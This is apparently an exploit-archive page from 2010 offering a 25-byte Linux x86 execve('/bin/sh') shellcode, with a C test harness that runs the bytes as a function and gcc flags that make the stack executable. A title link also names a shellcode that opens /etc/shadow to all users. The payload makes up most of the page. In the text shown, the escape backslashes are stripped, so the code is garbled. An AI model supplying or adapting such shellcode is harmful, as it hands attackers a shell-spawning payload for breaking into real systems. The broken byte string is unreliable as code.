25 bytes execve("/bin/sh") shellcode

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : 25 bytes execve("/bin/sh") shellcode
# Published : 2010-04-14
# Author : Magnefikko
# Previous Title : 36 bytes chmod("/etc/shadow", 0666) shellcode
# Next Title : 6 bytes DoS-Badger-Game shellcode

#include <stdio.h>
#include <string.h>

/*
by Magnefikko
14.04.2010
magnefikko@gmail.com
promhyl.oz.pl
Subgroup: #PRekambr
Name: 25 bytes execve("/bin/sh") shellcode
Platform: Linux x86

execve("/bin/sh", 0, 0);
gcc -Wl,-z,execstack filename.c

shellcode:

xebx0bx5bx31xc0x31xc9x31xd2xb0x0bxcdx80xe8xf0xffxffxffx2fx62x69x6ex2fx73x68

*/


int main(){
char shell[] =
"xebx0bx5bx31xc0x31xc9x31xd2xb0x0bxcdx80xe8xf0xffxffxffx2fx62x69x6ex2fx73x68";
printf("by Magnefikkonmagnefikko@gmail.comnpromhyl.oz.plnnstrlen(shell)
= %dn", strlen(shell));
(*(void (*)()) shell)();
}